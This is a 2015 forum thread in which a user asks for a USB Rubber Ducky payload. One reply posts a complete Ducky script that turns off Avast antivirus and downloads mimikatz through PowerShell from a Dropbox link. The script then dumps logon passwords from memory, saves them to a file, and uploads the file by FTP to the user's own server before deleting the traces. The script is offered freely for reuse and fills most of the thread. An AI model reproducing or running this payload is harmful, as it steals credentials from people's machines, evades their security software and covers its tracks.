Herschy1 Posted August 18, 2015 Share Posted August 18, 2015 Hello I need to create a payload for rubber ducky. I am willing to pay to a developer that can help me with this. I really need it. Pleasee. Thanks Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted August 19, 2015 Share Posted August 19, 2015 There are plenty of free resources available: http://usbrubberducky.com/#!index.md Quote Link to comment Share on other sites More sharing options...
Para Posted August 19, 2015 Share Posted August 19, 2015 Also, encoding is easy using the free online toolkit Quote Link to comment Share on other sites More sharing options...
kirito Posted August 25, 2015 Share Posted August 25, 2015 Just go on google there are loads, here's one that I made for free: REM This is a rough version of usb rubber ducky code to disable REM avast, download mimikatz, and upload the password text file REM to an ftp server, feel free to make changes, this is a roughREM guidline :)DELAY 2000WINDOWS rDELAY 400REM You may need to change this to a different locationSTRING "C:\Program Files\AVAST Software\Avast\AvastUI.exe"ENTERDELAY 2000REM this is going to settingsDOWNARROWDELAY 100DOWNARROWDELAY 100DOWNARROWDELAY 100DOWNARROWDELAY 100DOWNARROWDELAY 100DOWNARROWDELAY 100DOWNARROWDELAY 100DOWNARROWDELAY 100REM should be over settingsENTERDELAY 100DOWNARROWDELAY 300RIGHTARROWDELAY 200RIGHTARROWDELAY 200ENTERDELAY 350DOWNARROWDELAY 100ENTERDELAY 100ALT yDELAY 100ALT F4DELAY 500ALT F4REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs)DELAY 3000CONTROL ESCAPEDELAY 1000STRING cmdDELAY 1000CTRL-SHIFT ENTERDELAY 1000ALT yDELAY 300ENTERSTRING powershell (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/retct66be69wwqm/mimikatz.exe?dl=1,%TEMP%\mimikatz.exe')REM <THIS IS MIMIKATZ I TAKE NO RESPONSIBILITY FOR ANYONESREM ACTIONS WITH THIS TOOl>DELAY 300ENTERDELAY 3000STRING %TEMP%\mimikatz.exeDELAY 300ENTERDELAY 3000STRING privilege::debugDELAY 300ENTERDELAY 1000STRING sekurlsa::logonPasswords fullDELAY 300ENTERDELAY 1000STRING exitDELAY 300ENTERDELAY 100STRING del %TEMP%\mimikatz.exeDELAY 300ENTERDELAY 200STRING exitDELAY 600ALT SPACEDELAY 400STRING eDELAY 400STRING sDELAY 200ENTERDELAY 500WINDOWS rDELAY 350STRING notepadDELAY 200ENTERCONTROL vDELAY 600CONTROL sSTRING %USERPROFILE%\mimikatz.txtENTERDELAY 500ALT F4DELAY 500WINDOWS rDELAY 300STRING cmdDELAY 100ENTERDELAY 600STRING cd %USERPROFILE%STRING ftp <YOUR FTP SERVER>ENTERDELAY 500STRING <YOUR USERNAME>ENTERDELAY 500STRING <YOUR PASSWORD>ENTERDELAY 800STRING put mimikatz.txtENTERDELAY 600STRING byeENTERDELAY 700STRING DEL /F /S /Q /A "mimikatz.txt"ENTERDELAY 300ALT SPACEDELAY 500STRING c Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.